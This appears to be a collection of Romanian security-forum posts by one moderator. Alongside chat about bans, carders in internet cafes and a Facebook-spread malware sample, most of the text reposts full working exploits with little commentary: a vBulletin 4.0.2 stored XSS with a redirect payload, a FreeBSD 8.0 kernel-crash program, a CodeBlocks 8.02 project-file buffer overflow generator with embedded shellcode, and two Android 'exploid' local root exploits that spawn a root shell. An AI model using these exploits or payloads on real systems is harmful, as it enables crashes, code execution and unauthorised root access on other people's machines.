Nytro

Felicitari

Avertisment pentru Offtopic. Daca i-am dat avertisment, de ce mai veniti si comentati aiurea?

De ieri citesc "Cartea numelor" si azi mi-am cumparat o carte despre "MySQL"

Sok(er): Topicul e la gunoi, aici pot posta pana li se strica tastaturile. vini4p: Daca las link-urile, se gasesc ratati care sa descarce si zic apoi ca "ia virusi de pe RST".

begood: Da, la asta m-am gandit si eu, dar CRC sau MD5 sau alt checksum ar trebui sa fie calculat in functie de tot fisierul, nu de 2-3 MB maxim care se puteau uploada. Probabil verifica "inceputul" fisierelor daca acestea sunt foarte mari, oricum a fost ciudat. Mai aveam un film interesant, sa il caut si il postez, daca nu l-am postat deja cu ceva mai mult timp in urma.

Revolution OS Este un documentar despre Linux, despre cum a aparut, despre oamenii din spatele lui si mentalitatea, modul de a gandi adus de Free Software Foundation. Mie mi-a placut, am aflat multe lucruri interesante. Nu are subtitrare, dar sunt sigur ca va descurcati cu limba engleza. Chestia ciudata e urmatoarea: filmul are 700 de mega, dar s-a uploadat in cateva secunde. Ma gandeam ca nu merge, dar l-am descarcat si a mers. In plus, am vazut ca se poate vedea si online. Chiar nu inteles cum s-a uploadat in 3-5 secunde, deci e posibil sa nu mearga. Durata: 01:25:09 Marime: 701.4 MB Download: http://www.megaupload.com/?d=KSJ9KJ9F Online: http://www.megavideo.com/?d=KSJ9KJ9F

Stealer, ban permanent.

Nu stiu cat de adevarat e ca a fost gasit de cineva de la Inj3ct0r... A gasit cineva un forum <= 4.02 ? Si am mai vazut si asta: Vbulletin Blog 4.0.2 XSS Vulnerability Author: FormatXformat Version: Vbulletin 4.0.2 Dork: Powered by vBulletin™ Version 4.0.2 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved. The script is affected by Permanent XSS vulnerability, so you can put in bad java script code <script>alert('put this script in title')</script> <meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'> 1st register Go to Blogs page Create New Post Inject your java script into Title Box You must go back to Main page to see this XSS effect. Greets: Neo, Sa3id, All Tkurd.net Members Sursa: Vbulletin Blog 4.0.2 Title XSS Vulnerability

Da, multi s-au oferit sa scrie, putini au facut-o. Sa vad ce o sa fac, vreau sa imi termin un articol, apoi poate redeschidem proiectul.

Linux kernel internals 07. Process subsystem Process creation (fork) Process transformation (exec) Process synchronization (exit and wait) Processes and threads (clone) Credentials and capabilities Sessions and processgroups System boot Download: http://www.studioat.nl/Training/Voorbeelden/linux-kernel-internals.pdf

Ai venit numai la caterinca. Ban.

Totusi, spam, ban

Acum vad si eu porcaria asta. Probabil vinul e de vina ca am inceput sa rad, dar nu mai conteaza, m-a facut sa rad, nu ii dau ban. Oricum, se muta la "Cele mai penale posturi".

Ce gandiri stupido-conspirationiste...

Nu, nu exista.

Cele mai multe tampenii se faceau de la Internet Cafe-urile: cel din Casa Stiintei, cel de langa Scoala Nr. 9, si mai era unul Underground, in Traian. La asta din urma, cei care se ocupau cu asa ceva, aveau un loc special, mai retras de unde isi faceau treburile. Eh, sunt multe povestioare cu astfel de porcarii. Idei de baza: + au adus bani in tara + i-au cheltuit in tara + unii au ajuns bogati - unii sunt in puscarie, dar isi merita soarta - au adus un renume extrem de prost (desi uzual e mai mult o lauda) atat Romaniei cat si frumosului meu oras natal - in nici un caz astfel de persoane nu pot fi numite "hackeri", sunt doar un alt tip de hoti Si probabil altele...

gabyyy: Da, le stiam cam pe toate. Voodoo era la parterul unui bloc cu 10 etaje, pe la Hermes?

A fost creata o aplicatie (de Facebook), si nu stiu cum (si nici nu ma intereseaza) a facut redirect pe o pagina [de pe Facebook] (chiar daca utilizatorul nu a dat Allow la acea aplicatie) catre un executabil. Modificare: Am gasit link-ul fisierului, si ma uit peste el. Initial am dat de: "imbot.exe|1|M|0|0|/stext "C:\pass.txt"|0|7|0|0|0|1|0|bak burda ne war!|1|1|1|10|" care este un sir de setari folosit de bindere/cryptere. Ceea ce imi spune ca va scrie fisierul imbot.exe care probabil va salva ceva in C:\pass.txt. Deci e vorba de un rahat, nu e ceva complex. Nu am timp si nici chef sa aflu in detaliu ce face, ma uit doar putin peste el. PS: "bak burda ne war" = "Uite aici, ce r?zboi!". Interesant.

Era detectat ca IRC Bot, deci o porcarie probabil. Oricum, ideea de spreding e oarecum noua, imi place ca se descarca automat.

Vezi ce functii importa, poate te ajuta asta. Probabil algoritmul e unul standar, incearca cativa. Incearca sa folosesti acea cheie cu cativa algoritmi. In cel mai urat caz, va trebui sa dezasamblezi programul sa vezi ce functii apeleaza si cu ce parametrii. Si e nasoala treaba. Mai usor nu stiu daca se poate.

Locuiesc in Bucuresti momentan, facultate. Stateam in Ostroveni. Erau multi astfel de "hackeri" prin Internet Cafe-uri.

Nu am gasit nimic, jegul de Microsoft Security Essentials mi l-a sters si acum nu mai merge pagina. Daca il are cineva, sa imi trimita PM cu un link de download va rog.

FreeBSD 8.0 Local Denial of Service (forced reboot) # Exploit Title: FreeBSD local denial of service - forced reboot # Date: 28. January 2011 # Author: Kingcope # Software Link: http://www.freebsd.org # Operating System: FreeBSD # Tested on: 8.0-RELEASE This source code when compiled and executed will reboot at least FreeBSD 8.0-RELEASE because of a null pointer dereference. #include <sys/types.h> #include <sys/mman.h> #define PAGE_SIZE 4096 #include <sys/stat.h> #include <fcntl.h> #include <sys/socket.h> main() { int k,fd,i2,i3,i4,i5,i6,i7,i8; char *p; char buf[4096]; for (i2=0;i2<256;i2++) { for (i3=0;i3<2;i3++) { for (i4=0;i4<2;i4++) { fd = socket(i2, i3, i4); if (fd < 0) continue; printf("SUCCESS!\n"); for (i5=0;i5<100;i5++) { for (i6=0;i6<100;i6++) { setsockopt(fd, i5, i6, buf, 4); getsockopt(fd, i5, i6, buf, &i7); }}}}} } The crash dump looks like the following. Jan 28 11:33:07 r00tme kernel: Jan 28 11:33:07 r00tme kernel: Jan 28 11:33:07 r00tme kernel: Fatal trap 12: page fault while in kernel mode Jan 28 11:33:07 r00tme kernel: cpuid = 0; apic id = 00 Jan 28 11:33:07 r00tme kernel: fault virtual address = 0xc Jan 28 11:33:07 r00tme kernel: fault code = supervisor write, page not present Jan 28 11:33:07 r00tme kernel: instruction pointer = 0x20:0xc06143ba Jan 28 11:33:07 r00tme kernel: stack pointer = 0x28:0xcd1fa5b4 Jan 28 11:33:07 r00tme kernel: frame pointer = 0x28:0xcd1fa85c Jan 28 11:33:07 r00tme kernel: code segment = base 0x0, limit 0xfffff, type 0x1b Jan 28 11:33:07 r00tme kernel: = DPL 0, pres 1, def32 1, gran 1 Jan 28 11:33:07 r00tme kernel: processor eflags = interrupt enabled, resume, IOPL = 0 Jan 28 11:33:07 r00tme kernel: current process = 1004 (bsdcrash) Jan 28 11:33:07 r00tme kernel: trap number = 12 Jan 28 11:33:07 r00tme kernel: panic: page fault Jan 28 11:33:07 r00tme kernel: cpuid = 0 Jan 28 11:33:07 r00tme kernel: Uptime: 2m48s Jan 28 11:33:07 r00tme kernel: Cannot dump. Device not defined or unavailable. Jan 28 11:33:07 r00tme kernel: Automatic reboot in 15 seconds - press a key on the console to abort Jan 28 11:33:07 r00tme kernel: Rebooting... The cause of the crash seems to be a specific network driver. Since the crash is forced (only?) in a VMWare virtual machine the exploitability can be dependent on the loaded device drivers and installed hardware. This source code when compiled and executed will reboot at least FreeBSD 8.0-RELEASE because of a null pointer dereference. The cause of the crash seems to be a specific network driver. Since the crash is forced (only?) in a VMWare virtual machine the exploitability can be dependent on the loaded device drivers and installed hardware. Sursa: FreeBSD 8.0 Local Denial of Service (forced reboot) Interesant, ma intreb daca e si functional.

CodeBlocks v8.02 (cbp) Buffer Overflow Exploit #!/usr/bin/python import sys,os,shutil if len(sys.argv) != 3: print "------------------------------------------------" print "CodeBlocks (cbp) Buffer Overflow Exploit " print "Usage : exploit.py <project_name> <path>" print "Example : exploit.py sploit_proj c:\proj\\ " print "By : sup3r " print "------------------------------------------------" sys.exit(0) name = sys.argv[1] path = sys.argv[2] header1=( "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20" "\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x73\x74\x61" "\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\x79\x65\x73\x22\x20\x3f\x3e\x0a\x3c\x43\x6f" "\x64\x65\x42\x6c\x6f\x63\x6b\x73\x5f\x70\x72\x6f\x6a\x65\x63\x74\x5f\x66\x69\x6c" "\x65\x3e\x0a\x09\x3c\x46\x69\x6c\x65\x56\x65\x72\x73\x69\x6f\x6e\x20\x6d\x61\x6a" "\x6f\x72\x3d\x22\x31\x22\x20\x6d\x69\x6e\x6f\x72\x3d\x22\x36\x22\x20\x2f\x3e\x0a" "\x09\x3c\x50\x72\x6f\x6a\x65\x63\x74\x3e\x0a\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e" "\x20\x74\x69\x74\x6c\x65\x3d\x22"+name+"\x22\x20\x2f\x3e\x0a\x09\x09\x3c\x4f" "\x70\x74\x69\x6f\x6e\x20\x70\x63\x68\x5f\x6d\x6f\x64\x65\x3d\x22\x32\x22\x20\x2f" "\x3e\x0a\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f\x6d\x70\x69\x6c\x65\x72" "\x3d\x22\x67\x63\x63\x22\x20\x2f\x3e\x0a\x09\x09\x3c\x42\x75\x69\x6c\x64\x3e\x0a" "\x09\x09\x09\x3c\x54\x61\x72\x67\x65\x74\x20\x74\x69\x74\x6c\x65\x3d\x22\x44\x65" "\x62\x75\x67\x22\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x6f\x75" "\x74\x70\x75\x74\x3d\x22") header2=( "\x22\x20\x70\x72\x65\x66\x69\x78\x5f\x61\x75\x74\x6f\x3d\x22\x31\x22\x20\x65\x78" "\x74\x65\x6e\x73\x69\x6f\x6e\x5f\x61\x75\x74\x6f\x3d\x22\x31\x22\x20\x2f\x3e\x0a" "\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x6f\x62\x6a\x65\x63\x74\x5f\x6f" "\x75\x74\x70\x75\x74\x3d\x22\x6f\x62\x6a\x5c\x44\x65\x62\x75\x67\x5c\x22\x20\x2f" "\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x74\x79\x70\x65\x3d\x22" "\x31\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f" "\x6d\x70\x69\x6c\x65\x72\x3d\x22\x67\x63\x63\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09" "\x3c\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x09\x09\x09\x3c\x41\x64\x64" "\x20\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d\x67\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09" "\x3c\x2f\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x09\x3c\x2f\x54\x61\x72" "\x67\x65\x74\x3e\x0a\x09\x09\x09\x3c\x54\x61\x72\x67\x65\x74\x20\x74\x69\x74\x6c" "\x65\x3d\x22\x52\x65\x6c\x65\x61\x73\x65\x22\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70" "\x74\x69\x6f\x6e\x20\x6f\x75\x74\x70\x75\x74\x3d\x22\x62\x69\x6e\x5c\x52\x65\x6c" "\x65\x61\x73\x65\x5c"+name+"\x22\x20\x70\x72\x65\x66\x69\x78\x5f\x61\x75\x74" "\x6f\x3d\x22\x31\x22\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x5f\x61\x75\x74\x6f" "\x3d\x22\x31\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20" "\x6f\x62\x6a\x65\x63\x74\x5f\x6f\x75\x74\x70\x75\x74\x3d\x22\x6f\x62\x6a\x5c\x52" "\x65\x6c\x65\x61\x73\x65\x5c\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74" "\x69\x6f\x6e\x20\x74\x79\x70\x65\x3d\x22\x31\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09" "\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f\x6d\x70\x69\x6c\x65\x72\x3d\x22\x67\x63" "\x63\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e" "\x0a\x09\x09\x09\x09\x09\x3c\x41\x64\x64\x20\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d" "\x4f\x32\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x2f\x43\x6f\x6d\x70\x69\x6c\x65" "\x72\x3e\x0a\x09\x09\x09\x09\x3c\x4c\x69\x6e\x6b\x65\x72\x3e\x0a\x09\x09\x09\x09" "\x09\x3c\x41\x64\x64\x20\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d\x73\x22\x20\x2f\x3e" "\x0a\x09\x09\x09\x09\x3c\x2f\x4c\x69\x6e\x6b\x65\x72\x3e\x0a\x09\x09\x09\x3c\x2f" "\x54\x61\x72\x67\x65\x74\x3e\x0a\x09\x09\x3c\x2f\x42\x75\x69\x6c\x64\x3e\x0a\x09" "\x09\x3c\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x09\x3c\x41\x64\x64\x20" "\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d\x57\x61\x6c\x6c\x22\x20\x2f\x3e\x0a\x09\x09" "\x3c\x2f\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x3c\x55\x6e\x69\x74\x20" "\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x6d\x61\x69\x6e\x2e\x63\x22\x3e\x0a\x09" "\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f\x6d\x70\x69\x6c\x65\x72\x56\x61" "\x72\x3d\x22\x43\x43\x22\x20\x2f\x3e\x0a\x09\x09\x3c\x2f\x55\x6e\x69\x74\x3e\x0a" "\x09\x09\x3c\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x73\x3e\x0a\x09\x09\x09\x3c\x63" "\x6f\x64\x65\x5f\x63\x6f\x6d\x70\x6c\x65\x74\x69\x6f\x6e\x20\x2f\x3e\x0a\x09\x09" "\x09\x3c\x64\x65\x62\x75\x67\x67\x65\x72\x20\x2f\x3e\x0a\x09\x09\x3c\x2f\x45\x78" "\x74\x65\x6e\x73\x69\x6f\x6e\x73\x3e\x0a\x09\x3c\x2f\x50\x72\x6f\x6a\x65\x63\x74" "\x3e\x0a\x3c\x2f\x43\x6f\x64\x65\x42\x6c\x6f\x63\x6b\x73\x5f\x70\x72\x6f\x6a\x65" "\x63\x74\x5f\x66\x69\x6c\x65\x3e\x0a") c_file=( "#include <stdio.h>\n" "#include <stdlib.h>\n\n" "int main()\n" "{\r\n" " printf(\"Don't compile \");\n" " return 0;\n" "}\r\n") #calc shellcode -> 375 bytes shellcode=( "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIvSkymS8iKnKizNkipta" "4XtckmQ2SuCZMwgQQrVK3zKKL8bJTVqioWuCFZMR79Z4sN1mLEmqcz5WfLnimlbTOkz7YhM" "TVLjgORFvCiZQgVcUvmQxo71MCmQS2ZJxVlK1kjLZuoZOrZvPC2EBRnxL28JWY9YTVLjdPP" "f5KvjimNRTKSpompftKYZ47UVMNeMrrxiZtppx6MYMLvaCvrHjwvYqj2FV7rmKMOm6khlKM" "OuUOMzCOQvNwl1T6xmwgKzUNZqQXRPMPNmaQo8Nnpnn77Jq6k5pilYJ4mNQojymXqwvyUFO" "ytJPtq0vzNn7gw1CFtJA") payload = header1 payload += "\x41"*(4072-len(path)) payload += "\x74\x06\x41\x41" payload += "xp" payload += "\x30\x71" payload += "\x61"*169 payload += "\x41"*111 payload += shellcode payload += "\x61"*(6720-len(shellcode)) payload += header2 try: shutil.rmtree(path) except os.error: pass try: os.mkdir(path) cbp = open(path+name+'.cbp', 'w') cbp.write(payload) cbp.close() main = open(path+'main.c', 'w') main.write(c_file) raw_input("[x] Exploit project created!") except: print "Error!" Sursa: CodeBlocks v8.02 (cbp) Buffer Overflow Exploit Cred ca inca sunt multi utilizatori ai acelei versiuni. Eu am 10.05, are cineva 8.02 ca sa incerce?

Android 1.x/2.x Local Root Exploit /* android 1.x/2.x the real youdev feat. init local root exploit. * (C) 2009/2010 by The Android Exploid Crew. * * Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run. * Or use /data/local/tmp if available (thx to ioerror!) It is important to * to use /sqlite_stmt_journals directory if available. * Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc} * or use USB keys etc. This will invoke hotplug which is actually * our exploit making /system/bin/rootshell. * This exploit requires /etc/firmware directory, e.g. it will * run on real devices and not inside the emulator. * I'd like to have this exploitet by using the same blockdevice trick * as in udev, but internal structures only allow world writable char * devices, not block devices, so I used the firmware subsystem. * * !!!This is PoC code for educational purposes only!!! * If you run it, it might crash your device and make it unusable! * So you use it at your own risk! * * Thx to all the TAEC supporters. */ #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <linux/netlink.h> #include <fcntl.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <string.h> #include <unistd.h> #include <sys/stat.h> #include <signal.h> #include <sys/mount.h> #define SECRET "secretlol" void die(const char *msg) { perror(msg); exit(errno); } void copy(const char *from, const char *to) { int fd1, fd2; char buf[0x1000]; ssize_t r = 0; if ((fd1 = open(from, O_RDONLY)) < 0) die("[-] open"); if ((fd2 = open(to, O_RDWR|O_CREAT|O_TRUNC, 0600)) < 0) die("[-] open"); for ( { r = read(fd1, buf, sizeof(buf)); if (r < 0) die("[-] read"); if (r == 0) break; if (write(fd2, buf, r) != r) die("[-] write"); } close(fd1); close(fd2); sync(); sync(); } void clear_hotplug() { int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC); write(ofd, "", 1); close(ofd); } int main(int argc, char **argv, char **env) { char buf[512], path[512]; int ofd; struct sockaddr_nl snl; struct iovec iov = {buf, sizeof(buf)}; struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0}; int sock; char *basedir = NULL; /* I hope there is no LD_ bug in androids rtld */ /*if (geteuid() == 0 && getuid() != 0) rootshell(env);*/ if (readlink("/proc/self/exe", path, sizeof(path)) < 0) die("[-] readlink"); if (geteuid() == 0) { clear_hotplug(); /* remount /system rw */ //DROID 1 and Ally //mount("/dev/block/mtdblock4", "/system", "yaffs2", MS_REMOUNT, 0); //DROID X //mount("/dev/block/mmcblk1p21", "/system", "ext3", MS_REMOUNT, 0); //GALAXY S mount("/dev/block/stl9","/system", "rfs", MS_REMOUNT, 0); //Eris and HTC Hero //mount("/dev/block/mtdblock3", "/system", "yaffs2", MS_REMOUNT, 0); //copy("/sdcard/su","/system/bin/su"); //copy("/sdcard/Superuser.apk","/system/app/Superuser.apk"); copy("/data/data/com.unstableapps.easyroot/files/su","/system/bin/su"); copy("/data/data/com.unstableapps.easyroot/files/Superuser.apk","/system/app/Superuser.apk"); chmod("/system/bin/su", 04755); chmod("/system/app/Superuser.apk", 04744); for (; } //basedir = "/sqlite_stmt_journals"; basedir = "/data/data/com.unstableapps.easyroot/files"; if (chdir(basedir) < 0) { basedir = "/data/local/tmp"; if (chdir(basedir) < 0) basedir = strdup(getcwd(buf, sizeof(buf))); } memset(&snl, 0, sizeof(snl)); snl.nl_pid = 1; snl.nl_family = AF_NETLINK; if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0) die("[-] socket"); close(creat("loading", 0666)); if ((ofd = creat("hotplug", 0644)) < 0) die("[-] creat"); if (write(ofd, path , strlen(path)) < 0) die("[-] write"); close(ofd); symlink("/proc/sys/kernel/hotplug", "data"); snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c" "SUBSYSTEM=firmware%c" "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0); printf("[+] sending add message ...\n"); if (sendmsg(sock, &msg, 0) < 0) die("[-] sendmsg"); close(sock); sleep(3); return 0; } Sursa: Android 1.x/2.x Local Root Exploit Android 1.x/2.x HTC Wildfire Local Root Exploit /* android 1.x/2.x the real youdev feat. init local root exploit. * * * Modifications to original exploit for HTC Wildfire Stage 1 soft-root (c) 2010 Martin Paul Eve * Changes: * -- Will not remount /system rw (NAND protection renders this pointless) * -- Doesn't copy self, merely chmods permissions of original executable * -- No password required for rootshell (designed to be immediately removed once su binary is in place) * * Revised usage instructions: * -- Copy to /sqlite_stmt_journals/exploid and /sqlite_stmt_journals/su * -- chmod exploid to 755 * -- Execute the binary * -- Enable or disable a hotplug item (wifi, bluetooth etc. -- this could be done automatically by an app that packaged this exploit) -- don't worry that it segfaults * -- Execute it again to gain rootshell * -- Copy to device (/sqlite_stmt_journals/) + chown/chmod su to 04711 * -- Delete original exploid * -- Use modified Superuser app with misplaced su binary * * Explanatory notes: * -- This is designed to be used with a modified superuser app (not yet written) which will use the su binary in /sqlite_stmt_journals/ * -- It is important that you delete the original exploid binary because, otherwise, any application can gain root * * Original copyright/usage information * * (C) 2009/2010 by The Android Exploid Crew. * * Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run. * Or use /data/local/tmp if available (thx to ioerror!) It is important to * to use /sqlite_stmt_journals directory if available. * Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc} * or use USB keys etc. This will invoke hotplug which is actually * our exploit making /system/bin/rootshell. * This exploit requires /etc/firmware directory, e.g. it will * run on real devices and not inside the emulator. * I'd like to have this exploitet by using the same blockdevice trick * as in udev, but internal structures only allow world writable char * devices, not block devices, so I used the firmware subsystem. * * !!!This is PoC code for educational purposes only!!! * If you run it, it might crash your device and make it unusable! * So you use it at your own risk! * * Thx to all the TAEC supporters. * */ #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <linux/netlink.h> #include <fcntl.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <string.h> #include <unistd.h> #include <sys/stat.h> #include <signal.h> #include <sys/mount.h> void die(const char *msg) { perror(msg); exit(errno); } void clear_hotplug() { int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC); write(ofd, "", 1); close(ofd); } void rootshell(char **env) { char pwd[128]; char *sh[] = {"/system/bin/sh", 0}; setuid(0); setgid(0); execve(*sh, sh, env); die("[-] execve"); } int main(int argc, char **argv, char **env) { char buf[512], path[512]; int ofd; struct sockaddr_nl snl; struct iovec iov = {buf, sizeof(buf)}; struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0}; int sock; char *basedir = NULL, *logmessage; /* I hope there is no LD_ bug in androids rtld */ if (geteuid() == 0 && getuid() != 0) rootshell(env); if (readlink("/proc/self/exe", path, sizeof(path)) < 0) die("[-] readlink"); if (geteuid() == 0) { clear_hotplug(); chown(path, 0, 0); chmod(path, 04711); chown("/sqlite_stmt_journals/su", 0, 0); chmod("/sqlite_stmt_journals/su", 06755); return 0; } printf("[*] Android local root exploid (C) The Android Exploid Crew\n"); printf("[*] Modified by Martin Paul Eve for Wildfire Stage 1 soft-root\n"); basedir = "/sqlite_stmt_journals"; if (chdir(basedir) < 0) { basedir = "/data/local/tmp"; if (chdir(basedir) < 0) basedir = strdup(getcwd(buf, sizeof(buf))); } printf("[+] Using basedir=%s, path=%s\n", basedir, path); printf("[+] opening NETLINK_KOBJECT_UEVENT socket\n"); memset(&snl, 0, sizeof(snl)); snl.nl_pid = 1; snl.nl_family = AF_NETLINK; if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0) die("[-] socket"); close(creat("loading", 0666)); if ((ofd = creat("hotplug", 0644)) < 0) die("[-] creat"); if (write(ofd, path , strlen(path)) < 0) die("[-] write"); close(ofd); symlink("/proc/sys/kernel/hotplug", "data"); snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c" "SUBSYSTEM=firmware%c" "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0); printf("[+] sending add message ...\n"); if (sendmsg(sock, &msg, 0) < 0) die("[-] sendmsg"); close(sock); printf("[*] Try to invoke hotplug now, clicking at the wireless\n" "[*] settings, plugin USB key etc.\n" "[*] You succeeded if you find /system/bin/rootshell.\n" "[*] GUI might hang/restart meanwhile so be patient.\n"); return 0; } Sursa: Android 1.x/2.x HTC Wildfire Local Root Exploit